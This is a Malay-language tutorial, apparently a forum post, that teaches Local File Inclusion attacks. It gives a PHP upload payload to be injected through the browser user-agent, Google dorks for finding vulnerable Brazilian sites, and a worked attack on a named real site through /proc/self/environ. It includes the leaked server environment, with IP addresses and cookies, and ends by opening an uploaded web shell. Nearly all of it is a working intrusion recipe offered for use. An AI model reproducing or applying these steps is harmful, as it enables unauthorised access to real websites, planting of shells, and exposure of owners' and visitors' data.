Assalamualikum , arini Aku nak ajar korang Local File Inclusion [ LFI ].
Barang yg diperlukan :-
* Google Chrome* User Agent For Chrome
User Agent For Chrome boleh didapati di sini.
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
Korang install dulu User Agent. Lepas korang install , akan keluar satu bende dekat atas belah kanan .
Korang click tu lepas tu click Settings
Korang isi kan kotak-2 tu. Ikut ape yang aku tulis dekat bawah .
New User-agent name >> LFI
New User-Agent String >> <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>Code-Newbie</p><br>
<form action="" method="post" enctype="multipart/form-data">Filename: <input type="file" name="file" /><input type="submit" value="Submit" />
Group >> LFI
Append? >> Replace
Indicator Flag >> LFI
Okay lepastu tekan Add.
Ok , sekarang ni , kita tinggal cari website ,
Dork :- allinurl:?index.php?pagina=contato.php site:br
allinurl:?index.php?page=contact.php
allinurl:?index.php?pagina=noticias.php site:br
http://pastebin.com/rKWHFHVT
Dork korang boleh ubah ye .
ok , korang pilih salah satu website , contoh http://www.open-isb.com.br/index.php?pagina=noticias.php
korang ubah lepas "=" , ubah noticias.php tu jadi %2Fproc%2Fself%2Fenviron , so dia akan jadi
http://www.open-isb.com.br/index.php?pagina=%2Fproc%2Fself%2Fenviron
Kalau site tu vuln , dia akn keluar :-
DOCUMENT_ROOT=/home/open-isb/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.3HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8HTTP_COOKIE=__utma=94620866.542769388.1366547884.1366547884.1366547884.1; __utmz=94620866.1366547884.1.1.utmccn=(referral)|utmcsr=facebook.com|utmcct=/l.php|utmcmd=referralHTTP_HOST=www.open-isb.com.brHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31HTTP_X_FORWARDED_FOR=203.106.157.12HTTP_X_VARNISH=1706120852LOG_SUBDIR=open-isbPATH=/bin:/usr/binPHPRC=/home/open-isbQS_AllConn=95QS_ConnectionId=13675908865048115804886QS_SrvConn=95QUERY_STRING=pagina=%2Fproc%2Fself%2FenvironREDIRECT_STATUS=200REMOTE_ADDR=203.106.157.12REMOTE_PORT=35382REQUEST_METHOD=GETREQUEST_URI=/index.php?pagina=%2Fproc%2Fself%2FenvironSCRIPT_FILENAME=/home/open-isb/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=187.45.193.219SERVER_ADMIN=webmaster@open-isb.com.brSERVER_NAME=www.open-isb.com.brSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheSUPHP_URI=/index.phpUNIQUE_ID=UYPH5rstwdsAABMWaCsAAACe
kalau korang nmpak tu , korang tekan
and pilih LFI ,
lepas klik LFI , korang click lagi LFI ,
Ok , nanti site tu akan allowed korang untuk upload shell :)
Buka SHELL : http://www.open-isb.com.br/shell.php
Good Luck :)
